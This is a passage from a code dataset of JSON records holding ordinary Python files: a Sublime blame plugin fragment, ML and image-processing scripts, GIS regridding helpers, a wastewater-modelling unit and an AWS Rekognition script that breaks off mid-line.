querystring = parse_qs(url.query)\n # print(url)\n # print(querystring)\n\n if url.path == \"copy\":\n sublime.set_clipboard(querystring[\"sha\"][0])\n 
sublime.status_message(\"Git SHA copied to clipboard\")\n elif url.path == \"show\":\n sha = querystring[\"sha\"][0]\n try:\n desc = self.get_commit(sha, self.view.file_name())\n except Exception as e:\n communicate_error(e)\n return\n\n buf = self.view.window().new_file()\n buf.run_command(\n \"blame_insert_commit_description\",\n {\"desc\": desc, \"scratch_view_name\": \"commit \" + sha},\n )\n elif url.path == \"prev\":\n sha = querystring[\"sha\"][0]\n row_num = querystring[\"row_num\"][0]\n sha_skip_list = querystring.get(\"skip\", [])\n if sha not in sha_skip_list:\n sha_skip_list.append(sha)\n self.run(\n None,\n prevving=True,\n fixed_row_num=int(row_num),\n sha_skip_list=sha_skip_list,\n )\n elif url.path == \"close\":\n # Erase all phantoms\n self.phantom_set.update([])\n else:\n communicate_error(\n \"No handler for URL path '{0}' in phantom\".format(url.path)\n )\n\n\nclass BlameInsertCommitDescription(sublime_plugin.TextCommand):\n\n # Overrides --------------------------------------------------\n\n def run(self, edit, desc, scratch_view_name):\n view = self.view\n view.set_scratch(True)\n view.assign_syntax(\"Packages/Diff/Diff.sublime-syntax\")\n view.insert(edit, 0, desc)\n view.set_name(scratch_view_name)\n view.set_read_only(True)\n","sub_path":"src/blame.py","file_name":"blame.py","file_ext":"py","file_size_in_byte":7894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"473244759","text":"#### Librerias a utilizar #####\nimport numpy as np \nimport pandas as pd\nfrom sklearn import datasets,linear_model\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split #separa data\nimport sklearn\nfrom sklearn.utils import resample\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import roc_curve, roc_auc_score\n\n#KNN\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.neighbors import KNeighborsClassifier\n\n#logistic regresion\nfrom sklearn.linear_model import LogisticRegression\n\n#Naive Bayes\nfrom sklearn.naive_bayes import GaussianNB\n\n#MatrixConfusion\n\nfrom sklearn.metrics import confusion_matrix\n\n\n\n\n\n# Import libraries for graphs\nfrom mpl_toolkits import mplot3d\n\nfilename=\"genero.txt\"\n\ndef main():\n \n #Lectura de Datos\n data_default = pd.read_csv(filename,sep=\",\",header=0)\n\n # Entendimiento de la data\n print('Informacion del data set')\n \"\"\" print(data_default.shape)\n print(data_default.head(78))\n print(data_default.columns) \"\"\"\n\n #Convertir yes y no a 1 o 0\n data_default.loc[data_default['Gender'] == 'Male' , 'Gender'] = 1\n data_default.loc[data_default['Gender'] == 'Female' , 'Gender'] = 0\n\n #Imprimir data set despues de conversion\n X_male = data_default['Gender'] == 1\n X_female = data_default['Gender'] == 0\n #### PREPARAR DATA PARA KNN ###\n\n #Define inputs X columns studen, balance and income\n X = data_default.iloc[:,1:3]\n\n #Defino output\n y = data_default.iloc[:,0]\n\n indices = range(X.shape[0])\n #Partimos los data sets\n X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.2)\n \n y_train=y_train.astype('int')\n y_test=y_test.astype('int')\n\n clf = LogisticRegression()\n clf.fit(X_train, y_train)\n\n y_score1 = clf.predict_proba(X_test)[:,1]\n\n false_positive_rate1, true_positive_rate1, threshold1 = roc_curve(y_test, y_score1)\n print('roc_auc_score for logistic regresion: ', roc_auc_score(y_test, y_score1))\n\n\n knn = KNeighborsClassifier(algorithm='brute',n_neighbors=75)\n 
knn.fit(X_train,y_train) \n\n y_score2 = knn.predict_proba(X_test)[:,1]\n\n false_positive_rate2, true_positive_rate2, threshold2 = roc_curve(y_test, y_score2)\n print('roc_auc_score for KNN: ', roc_auc_score(y_test, y_score2))\n\n\n NB = GaussianNB()\n NB.fit(X_train, y_train)\n y_score3 = NB.predict_proba(X_test)[:,1]\n\n false_positive_rate3, true_positive_rate3, threshold3 = roc_curve(y_test, y_score3)\n print('roc_auc_score for Naive Bayes: ', roc_auc_score(y_test, y_score3))\n\n\n plt.subplots(1, figsize=(10,10))\n plt.title('ROC for data genero')\n \n plt.plot(false_positive_rate1, true_positive_rate1,color=\"blue\")\n plt.plot(false_positive_rate2, true_positive_rate2, color=\"red\")\n plt.plot(false_positive_rate3, true_positive_rate3, color=\"green\")\n\n plt.plot([0, 1], ls=\"solid\")\n plt.plot([0, 0], [1, 0] , c=\".7\"), plt.plot([1, 1] , c=\".7\")\n \n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n\n plt.legend([\"Logistic regression\", \"KNN\", \"Naive Bayes\"])\n plt.show()\n\nmain()","sub_path":"ROC_genero.py","file_name":"ROC_genero.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"278554841","text":"import paho.mqtt.client as mqtt\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n client.subscribe(\"sensortoy/led\")\n\ndef on_message(client, userdata, msg):\n if msg.payload == \"on\":\n print(\"Led On\\r\\n\")\n else :\n print(\"Led Off\\r\\n\")\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"localhost\", 1883, 60)\n\nclient.loop_forever()\n\n","sub_path":"Client/MockSensorToy.py","file_name":"MockSensorToy.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"594703202","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport sys\n\n__author__ = \"Onceabu\"\n__version__ = \"v2.0\"\n\n\"\"\"\n Time \n describe \n copyright (c) 2019 by Abu\n\"\"\"\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n\nclass Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n # the tricky part here is not really the algorithm; knowing increasing subsequences is the real key\n # whenever a subsequence is increasing, summing its successive gains equals its maximum minus its minimum\n return sum([\n prices[i + 1] - prices[i] for i in range(len(prices) - 1) if prices[i + 1] > prices[i]\n ])\n","sub_path":"Week_03/G20200343030573/LeetCode_122_573.py","file_name":"LeetCode_122_573.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"556740386","text":"from korm import korm\nfrom AxoftUser import AxoftUser\n\nimport Data.KormOrderStatusesPositive as Positive\nimport Data.KormOrderStatusesNegative as Negative\nimport Data.KormOrderStatusesNotValid as NotValid\n\nuser = AxoftUser()\nuser.AuthFrontend()\nuser.AuthBackend()\noKorm = korm(user)\n\nimport time\ndef test_korm(ReplacementDictionary):\n\tfor test_case in ReplacementDictionary:\t\t\n\t\toKorm.addProduct(user)\t\t\n\t\toKorm.createOrder(user)\n\t\tOrderId = user.getLastOrderId()\t\t\n\t\ttest_case['Number'] = str(OrderId)\n\t\tAxNum = 'Ax000' + str(OrderId)\n\t\ttest_case['1cID'] = AxNum\n\t\ttest_case['AxID'] = AxNum\n\n\t\toKorm.setOrderStatus('Data/TemplateOrder.xml', test_case)\t\t\n\t\toKorm.prepareOrder()\n\t\toKorm.sendKorm('Data/TemplateApproveKORM.xml', dict( [('Number', test_case['Number']), 
('1cID', test_case['1cID'])] ) )\n\t\t\n\t\toKorm.WriteLog(test_case)\t\t\n\ntest_korm(Positive.ReplacementDictionary)\ntest_korm(Negative.ReplacementDictionary)\ntest_korm(NotValid.ReplacementDictionary)","sub_path":"Axoft/kormtest.py","file_name":"kormtest.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"294199420","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 26 11:50:58 2020\n\n@author: tes520\n\"\"\"\nimport ESMF\n\nimport numpy as np \nimport subprocess\n\nfrom osgeo import gdal\nfrom tqdm import tqdm\n\nimport sys\n# sys.path.append('/media/tes520/LaCie1/Mapping/modules')\n# from __FL import Read_NCDF\n# from __CLASS import GetGeoTransform, UpdateGT\nfrom __GEO import GetGeoTransform, UpdateGT\n\n\ndef regrid_to_sat_tile(raster_path, varname, tileshape_path,\n sat_lats, sat_lons):\n \n #crop to tile shapefile\n crop_cmd = 'gdalwarp -cutline '+tileshape_path+' -crop_to_cutline '+\\\n raster_path+' '+\\\n tileshape_path.replace('tile.shp', varname+'_tile.tif')\n subprocess.call(crop_cmd, shell=True)\n cropped_path = tileshape_path.replace('tile.shp', varname+'_tile.tif')\n\n \n #read in raster and get geotransform data\n raster = gdal.Open(cropped_path)\n raster_gt = GetGeoTransform(cropped_path)\n raster_arr = raster.ReadAsArray()\n \n lons_in = np.arange(raster_gt['ulx'], raster_gt['lrx'], raster_gt['xres'])\n lats_in = np.arange(raster_gt['uly'], raster_gt['lry'], raster_gt['yres'])\n \n #lat/lon info to feed into regridder\n x_dist = raster_gt['xres']/2\n y_dist = raster_gt['yres']/2\n \n if len(raster_arr.shape) > 2:\n n = len(raster_arr)\n raster_regridded = np.zeros((n, sat_lats.shape[0], sat_lons.shape[0]))\n else:\n n = 1\n raster_regridded = np.zeros((n, sat_lats.shape[0], sat_lons.shape[0]))\n raster_arr = raster_arr.reshape(1, raster_arr.shape[0], raster_arr.shape[1])\n \n #regrid by selecting a large MODIS pixel, and finding the overlapping pixel\n for i in tqdm(range(len(lons_in))):\n x = lons_in[i]\n \n xinds = np.where(np.logical_and(x - x_dist <= sat_lons, sat_lons <= x + x_dist))[0]\n #exclude areas outside the raster\n if len(xinds) == 0:\n continue\n \n for j in range(len(lats_in)):\n y = lats_in[j]\n \n yinds = np.where(np.logical_and(y + y_dist <= sat_lats, sat_lats <= y - y_dist))[0]\n if len(yinds) == 0:\n continue\n for k in range(n):\n raster_regridded[k,yinds[0]:yinds[-1]+1,xinds[0]:xinds[-1]+1] = raster_arr[k,j,i]\n #write to file\n UpdateGT(tileshape_path.replace('tile.shp',varname+'_regridded.tif'), raster_regridded, \n tileshape_path.replace('tile.shp', 'tile.tif'))\n \n return raster_regridded\n \n\ndef regrid(dataset,src_lon,src_lat,dst_lon,dst_lat,FORTRAN_CONTIGUOUS = True):\n \n ESMF.Manager(debug=True)\n\n\n #use fortran engine when reshaping\n if FORTRAN_CONTIGUOUS:\n dst_shape = dst_lat.T.shape\n src_shape = src_lat.T.shape\n else:\n dst_shape = dst_lat.shape\n src_shape = src_lat.shape\n \n \n #source met grid\n sourcegrid = ESMF.Grid(np.array(src_shape), staggerloc=ESMF.StaggerLoc.CENTER, coord_sys=ESMF.CoordSys.SPH_DEG)\n #destination grid based on LDS date data\n destgrid = ESMF.Grid(np.array(dst_shape), staggerloc=ESMF.StaggerLoc.CENTER, coord_sys=ESMF.CoordSys.SPH_DEG)\n \n source_lon = sourcegrid.get_coords(0)\n source_lat = sourcegrid.get_coords(1)\n \n dest_lon = destgrid.get_coords(0)\n dest_lat = destgrid.get_coords(1)\n \n #add data to pointers\n if FORTRAN_CONTIGUOUS:\n source_lon[...] 
= src_lon.T\n source_lat[...] = src_lat.T\n \n dest_lon[...] = dst_lon.T\n dest_lat[...] = dst_lat.T\n else:\n source_lon[...] = src_lon\n source_lat[...] = src_lat\n \n dest_lon[...] = dst_lon\n dest_lat[...] = dst_lat\n \n sourcefield = ESMF.Field(sourcegrid, name='ECMWF 0.1x0.1')\n \n destfield = ESMF.Field(destgrid, name='LDS 50kmx50km')\n \n if FORTRAN_CONTIGUOUS:\n sourcefield.data[...] = dataset.T\n else:\n sourcefield.data[...] = dataset\n \n regrid = ESMF.Regrid(sourcefield, destfield, regrid_method=ESMF.RegridMethod.BILINEAR, \n unmapped_action=ESMF.UnmappedAction.IGNORE)\n \n destfield = regrid(sourcefield, destfield)\n \n return destfield.data.T\n\n\n\ndef write_to_raster(outfile, data, lats, lons, epsg = 4326):\n \n from osgeo import osr\n \n xmin,ymin,xmax,ymax = [lons.min(),lats.min(),lons.max(),lats.max()]\n \n if len(np.shape(data)) > 2:\n n,nrows,ncols = np.shape(data)\n else:\n nrows,ncols = np.shape(data)\n data = data.reshape(1, data.shape[0], data.shape[1])\n n = 1\n \n xres = (xmax-xmin)/float(ncols)\n yres = (ymax-ymin)/float(nrows)\n geotransform=(xmin,xres,0,ymax,0, -yres) \n # That's (top left x, w-e pixel resolution, rotation (0 if North is up), \n # top left y, rotation (0 if North is up), n-s pixel resolution)\n \n output_raster = gdal.GetDriverByName('GTiff').Create(outfile ,ncols, nrows, n, gdal.GDT_Float32) # Open the file\n output_raster.SetGeoTransform(geotransform) # Specify its coordinates\n srs = osr.SpatialReference() # Establish its coordinate encoding\n srs.ImportFromEPSG(epsg) # This one specifies WGS84 lat long.\n # Anyone know how to specify the \n # IAU2000:49900 Mars encoding?\n output_raster.SetProjection( srs.ExportToWkt() ) # Exports the coordinate system \n \n for i in range(n): # to the file\n output_raster.GetRasterBand(i+1).WriteArray(data[i]) # Writes my array to the raster\n \n output_raster.FlushCache()","sub_path":"__SATMODEL.py","file_name":"__SATMODEL.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"172539516","text":"from django.shortcuts import render, redirect\nfrom .models import Queries, Equipment, Employees, Comment, Maintenance, Worktime, Eq_stoptime, Unstated_works\nfrom datetime import datetime, timedelta, timezone\nfrom django.db import connection\nuser_timezone_sql = '+03:00'\n\n\ndef change_time(request, query_id):\n query = Queries.objects.get(query_id=query_id)\n start_time = request.POST.get('start_datetime')\n stop_time = request.POST.get('stop_datetime')\n query.start_time = start_time\n query.stop_time = stop_time\n if query.appoint_time is None:\n query.appoint_time = query.post_time\n query.save()\n return redirect('/main/' + str(query_id))\n\ndef query_timeline(query_id):\n with connection.cursor() as cursor:\n cursor.execute(\"SELECT CONVERT_TZ(post_time, '+00:00', %s), CONVERT_TZ(appoint_time, '+00:00', %s), \"\n \"CONVERT_TZ(start_time, '+00:00', %s), CONVERT_TZ(stop_time, '+00:00', %s) FROM queries WHERE \"\n \"query_id = %s\", [user_timezone_sql, user_timezone_sql, user_timezone_sql, user_timezone_sql, query_id])\n times = cursor.fetchone()\n times = list(times)\n if times[1] is None:\n times[1] = datetime.now()\n\n if times[0].date() == times[1].date():\n new = times[1] - times[0]\n new = new.total_seconds() / 3600\n else:\n shift_end = times[0].replace(hour=15, minute=30)\n d1 = shift_end - times[0]\n shift_start = times[1].replace(hour=7, minute=0)\n d_last = times[1] - shift_start\n delta = times[1] - times[0]\n\n duration = timedelta(hours=0)\n 
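# step forward one calendar day at a time, crediting an 8-hour shift for each\n # full weekday (isoweekday < 6) between the two timestamps; weekends add nothing\n 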
i_date = times[0] + timedelta(hours=24)\n\n cancel = False\n while cancel == False:\n if i_date.date() == times[1].date():\n cancel = True\n else:\n if datetime.isoweekday(i_date.date()) < 6:\n duration = duration + timedelta(hours=8)\n i_date = i_date + timedelta(hours=24)\n new = d1 + duration + d_last\n new = new.total_seconds() / 3600\n\n\n if times[2] is None:\n times[2] = datetime.now()\n if times[1].date() == times[2].date():\n sent = times[2] - times[1]\n sent = sent.total_seconds() / 3600\n else:\n shift_end = times[1].replace(hour=15, minute=30)\n d1 = shift_end - times[1]\n shift_start = times[2].replace(hour=7, minute=0)\n d_last = times[2] - shift_start\n delta = times[2] - times[0]\n duration2 = timedelta(hours=0)\n i_date = times[1] + timedelta(hours=24)\n cancel = False\n while cancel == False:\n if i_date.date() == times[2].date():\n cancel = True\n else:\n if datetime.isoweekday(i_date.date()) < 6:\n duration2 = duration2 + timedelta(hours=8)\n i_date = i_date + timedelta(hours=24)\n sent = d1 + duration2 + d_last\n sent = sent.total_seconds() / 3600\n\n if times[3] is None:\n times[3] = datetime.now()\n if times[2].date() == times[3].date():\n process = times[3] - times[2]\n process = process.total_seconds() / 3600\n else:\n shift_end = times[2].replace(hour=15, minute=30)\n d1 = shift_end - times[2]\n shift_start = times[3].replace(hour=7, minute=0)\n d_last = times[3] - shift_start\n delta = times[3] - times[0]\n duration3 = timedelta(hours=0)\n i_date = times[2] + timedelta(hours=24)\n cancel = False\n while cancel == False:\n if i_date.date() == times[3].date():\n cancel = True\n else:\n if datetime.isoweekday(i_date.date()) < 6:\n duration3 = duration3 + timedelta(hours=8)\n i_date = i_date + timedelta(hours=24)\n process = d1 + duration3 + d_last\n process = process.total_seconds() / 3600\n\n return new, sent, process\n","sub_path":"main/query_funcs.py","file_name":"query_funcs.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"556695454","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\nQSDsan: Quantitative Sustainable Design for sanitation and resource recovery systems\n\nThis module is developed by:\n Smiti Mittal \n Yalin Li \n Anna Kogler\n \nThis module is under the University of Illinois/NCSA Open Source License.\nPlease refer to https://github.com/QSD-Group/QSDsan/blob/master/LICENSE.txt\nfor license details.\n'''\n\n# %%\n\nimport math\nfrom .. import Equipment, SanUnit, Component, WasteStream\n\n__all__ = ('ElectrochemicalCell',)\n\n# %%\n\nclass ElectrochemicalCell(SanUnit):\n\n '''\n \n Electrochemical cell for nutrient recovery.\n\n This unit has the following equipment:\n - :class:`Electrode`\n - :class: `Membrane`\n - :class: `Column`\n - :class: `Machine`\n\n Parameters\n ----------\n recovery : dict\n Keys refer to chemical component IDs. Values refer to recovery fractions (with 1 being 100%) for the respective chemicals.\n removal : dict\n Keys refer to chemical component IDs. Values refer to removal fractions (with 1 being 100%) for the respective chemicals.\n equipments : list\n List of Equipment objects part of the Electrochemical Cell.\n OPEX_over_CAPEX : float\n Ratio with which operating costs are calculated as a fraction of capital costs\n \n Example\n -------\n >>> # Set components\n >>> import qsdsan as qs\n >>> kwargs = dict(particle_size='Soluble',\n ... degradability='Undegradable',\n ... 
organic=False)\n >>> H2O = qs.Component.from_chemical('H2O', phase='l', **kwargs)\n >>> NH3 = qs.Component.from_chemical('NH3', phase='g', **kwargs)\n >>> NH3.particle_size = 'Dissolved gas'\n >>> NH4OH = qs.Component.from_chemical('NH4OH', phase='l', **kwargs)\n >>> H2SO4 = qs.Component.from_chemical('H2SO4', phase='l', **kwargs)\n >>> AmmoniumSulfate = qs.Component.from_chemical('AmmoniumSulfate', phase='l',\n ... **kwargs)\n >>> CleaningAgent = qs.Component('CleaningAgent', MW=1, phase='l', **kwargs)\n >>> cmps = qs.Components((H2O, NH3, NH4OH, H2SO4, AmmoniumSulfate, CleaningAgent))\n >>> # Assuming all has the same molar volume as water for demonstration purpose\n >>> for cmp in cmps:\n ... cmp.copy_models_from(H2O, names=['V'])\n ... cmp.default()\n >>> qs.set_thermo(cmps)\n >>> # Set waste streams\n >>> influent = qs.WasteStream('influent', H2O=1000, NH4OH=50)\n >>> cleaning_agent = qs.WasteStream('cleaning_agent', price=5)\n >>> # Set equipments\n >>> anode = qs.equipments.Electrode(name='anode', N=1, electrode_type='anode',\n ... material='graphite', surface_area=10)\n >>> cathode = qs.equipments.Electrode(name='cathode', N=1, electrode_type='cathode',\n ... material='carbon', surface_area=10, unit_cost=1)\n >>> membrane = qs.equipments.Membrane(name='membrane', N=2,\n ... material='polyethylene', unit_cost=0.2, surface_area=1)\n >>> column = qs.equipments.Column(name='column1', N=3,\n ... material='resin', unit_cost=2, surface_area=20)\n >>> machine = qs.equipments.Machine(name='fan', N=1, unit_cost=3)\n >>> # Set the unit\n >>> U1 = ElectrochemicalCell('U1', ins=(influent, cleaning_agent),\n ... outs=('rec', 'rem', 'leftover'),\n ... recovery={'NH4OH':0.6}, removal={'NH4OH':0.2},\n ... equipments=(anode, cathode, membrane, column, machine), OPEX_over_CAPEX = 0.2)\n >>> # Simulate and look at the results\n >>> U1.simulate()\n >>> U1.diagram()\n \n >>> U1.show()\n ElectrochemicalCell: U1\n ins...\n [0] influent\n phase: 'l', T: 298.15 K, P: 101325 Pa\n flow (g/hr): H2O 1e+06\n NH4OH 5e+04\n\n WasteStream-specific properties:\n pH : 7.0\n TN : 19424.5 mg/L\n TKN : 19424.5 mg/L\n [1] cleaning_agent\n phase: 'l', T: 298.15 K, P: 101325 Pa\n flow: 0\n\n WasteStream-specific properties: None for empty waste streams\n outs...\n [0] rec\n phase: 'l', T: 298.15 K, P: 101325 Pa\n flow (g/hr): NH4OH 3e+04\n\n WasteStream-specific properties:\n pH : 7.0\n TN : 775169.7 mg/L\n TKN : 775169.7 mg/L\n [1] rem\n phase: 'l', T: 298.15 K, P: 101325 Pa\n flow (g/hr): NH4OH 1e+04\n\n WasteStream-specific properties:\n pH : 7.0\n TN : 775169.7 mg/L\n TKN : 775169.7 mg/L\n [2] leftover\n phase: 'l', T: 298.15 K, P: 101325 Pa\n flow (g/hr): H2O 1e+06\n NH4OH 1e+04\n\n WasteStream-specific properties:\n pH : 7.0\n TN : 3964.4 mg/L\n TKN : 3964.4 mg/L\n >>> U1.results()\n Electro chem cell Units U1\n Design Type of electrode\t\t cathode\n Number of anode 1\n Material of anode graphite\n Surface area of anode m2 10\n Number of cathode 1\n Material of cathode carbon\n Surface area of cathode m2 10\n Number of membrane 2\n Material of membrane polyethylene\n Surface area of membrane m2 1\n Number of column1 3\n Material of column1 resin\n Surface area of column1 m2 20\n Number of fan 1\n Purchase cost anode USD 0.1\n cathode USD 1\n membrane USD 0.4\n column1 USD 120\n fan USD 3\n Total purchase cost USD 124\n Utility cost USD/hr 0\n Additional OPEX\t\t USD/hr\t 24.7\n\n '''\n\n def __init__(self, ID='', ins=None, outs=(), recovery={'NH3':0.6}, removal={'NH3':0.2},\n equipments=(), OPEX_over_CAPEX=0):\n if 
isinstance(equipments, Equipment):\n equipments = (equipments,)\n SanUnit.__init__(self=self, ID=ID, ins=ins, outs=outs, equipments=equipments)\n self.recovery = recovery\n self.removal = removal\n self.OPEX_over_CAPEX = OPEX_over_CAPEX\n\n _N_ins = 2\n _N_outs = 3\n\n def _run(self):\n influent, cleaner = self.ins\n recovered, removed, left = self.outs[0], self.outs[1], self.outs[2]\n\n mixture = WasteStream()\n mixture.mix_from(self.ins)\n left.copy_like(mixture)\n\n for chemical, ratio in self.recovery.items():\n recovered.imass[chemical] = mixture.imass[chemical]*ratio\n left.imass[chemical] = left.imass[chemical]-mixture.imass[chemical]*ratio\n\n for chemical, ratio in self.removal.items():\n removed.imass[chemical] = mixture.imass[chemical]*ratio\n left.imass[chemical] = left.imass[chemical]-mixture.imass[chemical]*ratio\n\n def _design(self):\n self.add_equipment_design()\n\n def _cost(self):\n self.add_equipment_cost()\n self.equip_costs = self.baseline_purchase_costs.values()\n add_OPEX = sum(self.equip_costs)*self.OPEX_over_CAPEX\n self._add_OPEX = {'Additional OPEX': add_OPEX}\n","sub_path":"qsdsan/sanunits/_electrochemical_cell.py","file_name":"_electrochemical_cell.py","file_ext":"py","file_size_in_byte":8080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"99509823","text":"from PIL import Image, ImageFilter\n\nTMP = \"/tmp/\"\n\n\ndef flip(image, file_name):\n path_list = []\n path = TMP + \"flip-left-right-\" + file_name\n img = image.transpose(Image.FLIP_LEFT_RIGHT)\n img.save(path)\n path_list.append(path)\n\n path = TMP + \"flip-top-bottom-\" + file_name\n img = image.transpose(Image.FLIP_TOP_BOTTOM)\n img.save(path)\n path_list.append(path)\n\n return path_list\n\n\ndef rotate(image, file_name):\n path_list = []\n path = TMP + \"rotate-90-\" + file_name\n img = image.transpose(Image.ROTATE_90)\n img.save(path)\n path_list.append(path)\n\n path = TMP + \"rotate-180-\" + file_name\n img = image.transpose(Image.ROTATE_180)\n img.save(path)\n path_list.append(path)\n\n path = TMP + \"rotate-270-\" + file_name\n img = image.transpose(Image.ROTATE_270)\n img.save(path)\n path_list.append(path)\n\n return path_list\n\n\ndef filter(image, file_name):\n path_list = []\n path = TMP + \"blur-\" + file_name\n img = image.filter(ImageFilter.BLUR)\n img.save(path)\n path_list.append(path)\n\n path = TMP + \"contour-\" + file_name\n img = image.filter(ImageFilter.CONTOUR)\n img.save(path)\n path_list.append(path)\n\n path = TMP + \"sharpen-\" + file_name\n img = image.filter(ImageFilter.SHARPEN)\n img.save(path)\n path_list.append(path)\n\n return path_list\n\n\ndef gray_scale(image, file_name):\n path = TMP + \"gray-scale-\" + file_name\n img = image.convert('L')\n img.save(path)\n return [path]\n\n\ndef resize(image, file_name):\n path = TMP + \"resized-\" + file_name\n image.thumbnail((128, 128))\n image.save(path)\n return [path]\n","sub_path":"aws/cpu-memory/image_processing/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"187602380","text":"#!/usr/bin/env python\n\nimport boto3 \nimport json\nimport os, sys\nimport image\nimport re\nimport thread\nimport requests\n\ndef replace_element(lst, new_element, indices):\n\tfor i in indices:\n\t\tlst[i] = new_element\n\treturn lst\n\ndef sendRequest(url, paramas):\n r = requests.post(url, data=paramas)\n print(r)\n\ndef imageRekogniser(imageurl):\n\n\tf = 
open(\"{}\".format(imageurl))\n\t# rek = boto3.client('rekognition')\n\t# readfile = f.read()\n\trek = boto3.client('rekognition', region_name='us-west-2', aws_access_key_id=\"IDHERE\", aws_secret_access_key=\"APIKEYHERE\")\n\treadfile = f.read()\n\tresults2 = rek.detect_faces( \n\t Image={\n\t 'Bytes': readfile\n\t },\n\t Attributes=[\n\t 'ALL',\n\t]\n\t)\n\n\tjsonDatastring = json.dumps(results2['FaceDetails'], indent=2)\n\tjsonData = json.loads(jsonDatastring)\n\n\tif len(jsonData) == 0:\n\t\tresults3 = rek.detect_labels( \n\t\t Image={\n\t\t 'Bytes': readfile\n\t\t },\n\t\t MaxLabels=15,\n\t \tMinConfidence=60\n\t\t)\n\n\t\tobjectsDictionaryArray = []\n\t\tjsonData2 = json.dumps(results3, indent=2)\n\t\tnewData2 = json.loads(jsonData2)\n\t\tobjects = newData2[\"Labels\"]\n\n\t\tfor i in objects:\n\t\t\tnameOfObject = i.get(\"Name\")\n\t\t\tobjectsDictionaryArray.append(nameOfObject)\n\t\tjointString = ', '.join(objectsDictionaryArray[:len(objectsDictionaryArray)-1])\n\t\tlastElement = '{}'.format(objectsDictionaryArray[len(objectsDictionaryArray)-1])\n\t\tprint(\"Your environment contains a {} and a {}\".format(jointString, lastElement))\n\t\t\t\n\telse:\n\n\t\tjsonDataa = json.dumps(results2['FaceDetails'][0], indent=2)\n\t\tnewData = json.loads(jsonDataa)\n\t\temotions = newData[\"Emotions\"]\n\t\tgender = newData[\"Gender\"]\n\n\t\tHighageRange = newData[\"AgeRange\"][\"High\"]\n\t\tLowageRange = newData[\"AgeRange\"][\"Low\"]\n\t\taverageAge = (HighageRange+LowageRange)/2\n\t\teveryemotionArray = []\n\t\tgenderArray = []\n\t\tgenderArray.append(gender)\n\n\t\tfor i in emotions:\n\t\t\teveryemotionArray.append(i)\n\n\t\tsingleEmotion = everyemotionArray[0]\n\t\tconf = singleEmotion[\"Confidence\"]\n\n\t\tvalueofgender = genderArray[0]\n\t\tconf2 = valueofgender[\"Value\"]\n\n\t\tn = conf*0.01\n\t\temotion = \"\"\n\n\n\t\tif singleEmotion[\"Type\"] == \"SAD\" or singleEmotion[\"Type\"] == \"CONFUSED\" or singleEmotion[\"Type\"] == \"ANGRY\" or singleEmotion[\"Type\"] == \"DISGUSTED\":\n\t\t\temotion = singleEmotion[\"Type\"]\n\t\t\tprint((1/n)-1)\n\t\telif singleEmotion[\"Type\"] == \"HAPPY\" or singleEmotion[\"Type\"] == \"SURPRISED\" or singleEmotion[\"Type\"] == \"CALM\":\n\t\t\temotion = singleEmotion[\"Type\"]\n\t\t\tprint(n)\n\t\telse:\n\t\t\tprint(0.5)\n\n\t\tresults3 = rek.detect_labels( \n\t\t Image={\n\t\t 'Bytes': readfile\n\t\t },\n\t\t MaxLabels=10,\n\t \tMinConfidence=60\n\t\t)\n\n\t\tlowercaseemotion = emotion.lower()\n\n\t\tobjectsDictionaryArray = []\n\t\tjsonData2 = json.dumps(results3, indent=2)\n\t\tnewData2 = json.loads(jsonData2)\n\t\tobjects = newData2[\"Labels\"]\n\n\t\tfor i in objects:\n\t\t\tnameOfObject = i.get(\"Name\")\n\t\t\tobjectsDictionaryArray.append(nameOfObject)\n\n\t\ttraits = ', '.join(objectsDictionaryArray[2:3])\n\t\tmoretraits = ','.join(objectsDictionaryArray[3:len(objectsDictionaryArray)-2])\n\t\tlastElement = '{}'.format(objectsDictionaryArray[len(objectsDictionaryArray)-1])\n\n\t\tbigstring = (\"Your environment contains a {} {} with {}, {} and an average age of {} with {} gender. 
